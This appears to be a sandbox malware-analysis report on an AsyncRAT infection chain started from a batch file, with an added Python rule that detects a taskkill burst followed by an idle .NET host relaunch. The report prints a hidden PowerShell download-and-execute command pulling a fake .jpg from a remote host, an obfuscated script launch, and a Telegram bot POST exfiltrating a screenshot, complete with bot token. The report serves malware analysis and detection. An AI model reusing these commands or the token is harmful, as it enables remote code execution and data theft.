Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
3           192.168.2.8  49711        149.154.167.220  443               2216  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-11-25 14:22:50 UTC   Bytes transferred: 208   Direction: OUT
POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1
Content-Type: multipart/form-data; boundary=058ae0d9-f381-4383-b2eb-b7376aff61a3
Host: api.telegram.org
Content-Length: 695695

Timestamp: 2024-11-25 14:22:50 UTC   Bytes transferred: 1024   Direction: OUT
Data Ascii:
--058ae0d9-f381-4383-b2eb-b7376aff61a3
Content-Disposition: form-data; name="chat_id"

7169414115
--058ae0d9-f381-4383-b2eb-b7376aff61a3
Content-Disposition: form-data; name="photo"; filename="screenshot.png"
Content-Type: image/png

<binary PNG image data>
Timestamp: 2024-11-25 14:22:52 UTC   Bytes transferred: 388   Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 25 Nov 2024 14:22:52 GMT
Content-Type: application/json
Content-Length: 973
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


Target ID: 0
Start time: 09:22:11
Start date: 25/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
Imagebase: 0x7ff7c9b70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 09:22:12
Start date: 25/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 09:22:12
Start date: 25/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Imagebase: 0x7ff7c9b70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                        Target ID:4
                                                                                                        Start time:09:22:12
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1867257966.000002E7C8E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868900966.000002E7CB886000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:09:22:24
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:09:22:24
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:9
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:11
                                                                                                        Start time:09:22:26
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:14
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

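The ten taskkill invocations above (Target IDs 5 to 14) are fired within four seconds, all with /IM and /F, and nine of the ten image names are .NET Framework utilities that .NET loaders commonly hollow; one of them, aspnet_compiler.exe, is then started with no arguments at all as Target ID 20. That kill-then-relaunch sequence is a useful detection on its own. The following script is an added example, not part of the Joe Sandbox report or of the sample's code: it runs the correlation over a constructed event list whose times and command lines are copied from the report's records, with the report's Target IDs reused as stand-in pid values. The parent of the taskkill processes (Target ID 4) and of aspnet_compiler.exe (Target ID 19), the 30-second window, the three-kill threshold and the benign control event are all assumptions.

```python
"""Correlate a taskkill /IM burst with a later idle launch of a killed .NET host.
Added example; events are constructed from the report, pids are stand-ins."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Images the burst targets; all but CCleanerBrowser.exe ship with the .NET
# Framework and are common injection hosts for .NET RATs such as AsyncRAT.
DOTNET_HOSTS = {
    "aspnet_regbrowsers.exe", "aspnet_compiler.exe", "applaunch.exe",
    "installutil.exe", "jsc.exe", "msbuild.exe", "regasm.exe", "cvtres.exe",
    "regsvcs.exe",
}


@dataclass
class ProcEvent:
    time: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str


def _t(hms: str) -> datetime:
    return datetime.strptime(f"2024-11-25 {hms}", "%Y-%m-%d %H:%M:%S")


TASKKILL = r"C:\Windows\System32\taskkill.exe"


def _kill(hms: str, pid: int, name: str) -> ProcEvent:
    # Parent pid 4 (the Target ID 4 PowerShell process) is an assumption.
    return ProcEvent(_t(hms), pid, 4, TASKKILL,
                     f'"C:\\Windows\\system32\\taskkill.exe" /IM {name} /F')


EVENTS = [  # constructed from the report's Target IDs 5-14 and 20
    _kill("09:22:24", 5, "CCleanerBrowser.exe"),
    _kill("09:22:24", 6, "aspnet_regbrowsers.exe"),
    _kill("09:22:25", 7, "aspnet_compiler.exe"),
    _kill("09:22:25", 8, "AppLaunch.exe"),
    _kill("09:22:25", 9, "InstallUtil.exe"),
    _kill("09:22:25", 10, "jsc.exe"),
    _kill("09:22:26", 11, "MSBuild.exe"),
    _kill("09:22:27", 12, "RegAsm.exe"),
    _kill("09:22:27", 13, "cvtres.exe"),
    _kill("09:22:27", 14, "RegSvcs.exe"),
    # Target ID 20: a killed host relaunched with no arguments (parent 19 assumed)
    ProcEvent(_t("09:22:43"), 20, 19,
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'),
    # Constructed benign control: an admin killing one stuck process
    ProcEvent(_t("09:30:00"), 40, 39, TASKKILL,
              r'"C:\Windows\system32\taskkill.exe" /IM notepad.exe /F'),
]


def taskkill_target(cmdline: str) -> str | None:
    m = re.search(r"/IM\s+(\S+)", cmdline, re.I)
    return m.group(1).lower() if m else None


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the (possibly quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        close = s.find('"', 1)
        rest = s[close + 1:] if close != -1 else ""
    else:
        rest = s.split(" ", 1)[1] if " " in s else ""
    return bool(rest.strip())


def find_kill_bursts(events, window=timedelta(seconds=30), min_kills=3):
    """Per parent, keep taskkill /IM targets when at least min_kills distinct
    images are killed within `window` of the first kill."""
    by_parent = defaultdict(list)
    for ev in events:
        if ev.image.lower().endswith("taskkill.exe"):
            name = taskkill_target(ev.cmdline)
            if name:
                by_parent[ev.ppid].append((ev.time, name))
    bursts = {}
    for ppid, kills in by_parent.items():
        kills.sort()
        first = kills[0][0]
        in_window = [(t, n) for t, n in kills if t - first <= window]
        if len({n for _, n in in_window}) >= min_kills:
            bursts[ppid] = in_window
    return bursts


def find_respawned_hosts(events, bursts):
    """After the burst, flag any killed .NET host relaunched with no arguments:
    an idle framework binary is the classic target for PE injection."""
    if not bursts:
        return []
    killed = {n for kills in bursts.values() for _, n in kills}
    burst_end = max(t for kills in bursts.values() for t, _ in kills)
    return [ev for ev in events
            if ev.time > burst_end
            and ev.image.rsplit("\\", 1)[-1].lower() in killed & DOTNET_HOSTS
            and not has_arguments(ev.cmdline)]


def detect(events):
    bursts = find_kill_bursts(events)
    return bursts, find_respawned_hosts(events, bursts)


if __name__ == "__main__":
    bursts, respawns = detect(EVENTS)
    for ppid, kills in bursts.items():
        print(f"ppid {ppid}: {len(kills)} taskkill /IM in burst")
    for ev in respawns:
        print(f"pid {ev.pid}: {ev.image} relaunched idle after burst")
```

In a real pipeline the event list would come from Sysmon event ID 1 or EDR process-creation telemetry; the benign control shows why a single taskkill must not fire the rule, and the argument check is what separates a user's normal MSBuild or RegAsm run from an empty host waiting to be written into.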
                                                                                                        Target ID:16
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
                                                                                                        Imagebase:0x7ff73b700000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:17
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
                                                                                                        Imagebase:0x7ff7c9b70000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:18
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:19
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        Has exited:true

                                                                                                        Target ID:20
                                                                                                        Start time:09:22:43
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                        Imagebase:0x310000
                                                                                                        File size:56'368 bytes
                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Target ID:21
                                                                                                        Start time:09:22:43
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                        Imagebase:0x6a0000
                                                                                                        File size:56'368 bytes
                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Has exited:false


                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:3
                                                                                                          Total number of Limit Nodes:0
                                                                                                          [Execution graph rendering: function at 7ffb4b176344 reaches a LoadLibraryExW call at 7ffb4b17634d and continues to 7ffb4b1763fd; node/edge layout data omitted]

                                                                                                          Control-flow Graph

                                                                                                          [Control-flow graph rendering of the function starting at 7ffb4b16daf6 (includes a call to 7ffb4b16dfb4); executed/not-executed block colouring and basic-block edge list omitted]
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4dec3a330c9d9eaba91716ae238ac9b5c292d297ee8a8d0f56c5127e60fcd18
                                                                                                          • Instruction ID: 5e9a92e0fbf61da3b2f630f865d2280eecd98f0e382ccf8e7f78b6edc759fc7b
                                                                                                          • Opcode Fuzzy Hash: c4dec3a330c9d9eaba91716ae238ac9b5c292d297ee8a8d0f56c5127e60fcd18
                                                                                                          • Instruction Fuzzy Hash: 35F1A17091CA4D8FEBA8EF28C8557E937E1FF54310F04826EE84DC7291DB7499458B82

                                                                                                          Control-flow Graph

                                                                                                          [Control-flow graph rendering of the function starting at 7ffb4b16e8a2 (includes a call to 7ffb4b16ed30); executed/not-executed block colouring and basic-block edge list omitted]
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f40e141ad46c7637f3d0c66d526e5859a2a795752a6771061481a21186c380ba
                                                                                                          • Instruction ID: 696174f638f4cbe0204d6ab1a47dcf634ab14d5d069db353b42e1a640a80d5d3
                                                                                                          • Opcode Fuzzy Hash: f40e141ad46c7637f3d0c66d526e5859a2a795752a6771061481a21186c380ba
                                                                                                          • Instruction Fuzzy Hash: 77E1C17191CA4A8FEBA8EF2CC8957E977D1FF54310F04866ED84DC3295CE78A8418B81

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 9b032ac479ddecd8907ff787f6f5abc37327a4a7dcb6592a0a644b72bd63651b
                                                                                                          • Instruction ID: 4a0410b8cc11fa67253697d1f9b238c346791fccfbba5d1bf3749335d97c8eab
                                                                                                          • Opcode Fuzzy Hash: 9b032ac479ddecd8907ff787f6f5abc37327a4a7dcb6592a0a644b72bd63651b
                                                                                                          • Instruction Fuzzy Hash: 2731C57190CA5D8FDB19EF6CC8496E9BBE0FB55311F04426AD049C3152DB74A806CB91

                                                                                                          Control-flow Graph

                                                                                                          [Control-flow graph rendering of the function starting at 7ffb4b6129f5; executed/not-executed block colouring and basic-block edge list omitted]
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2052036162.00007FFB4B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B610000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b610000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 03a4820b96d06a8f5c0311d45ca4ff40338f60a1f4f113eb6f271f1c5b56b2db
                                                                                                          • Instruction ID: dc707f4f5b97b44c7690862c232f97cccaadab3183738573f8347d811c9b36a6
                                                                                                          • Opcode Fuzzy Hash: 03a4820b96d06a8f5c0311d45ca4ff40338f60a1f4f113eb6f271f1c5b56b2db
                                                                                                          • Instruction Fuzzy Hash: 9BD117A290EB8A4FEBA6AF78CC555B5BFD1EF46314B0840FED54CC70A7D9289805C351

                                                                                                          Control-flow Graph

                                                                                                          [Control-flow graph rendering of the function starting at 7ffb4b233401; executed/not-executed block colouring and basic-block edge list omitted]
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b928f05847aa7e7c6a10744dfd99bde14a761bbaaa2e43e2752b92ddf57fab03
                                                                                                          • Instruction ID: 53b2363e630b268a48bedb0f48085e8e6515786ba78eca4a7812ae66f2aace94
                                                                                                          • Opcode Fuzzy Hash: b928f05847aa7e7c6a10744dfd99bde14a761bbaaa2e43e2752b92ddf57fab03
                                                                                                          • Instruction Fuzzy Hash: C18122B290DA8D4FD792FB78D8485A6BFE0FF59300B0441BAE64CC71A3EA28D905C751
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d2f36dac0431b6e5b897b2450c88ad5521864f69d53e047b8db1af767a421ce7
                                                                                                          • Instruction ID: 289a8727b22674d31e26b1af5a11455f65f2393a325ff142827b436b0c10c96b
                                                                                                          • Opcode Fuzzy Hash: d2f36dac0431b6e5b897b2450c88ad5521864f69d53e047b8db1af767a421ce7
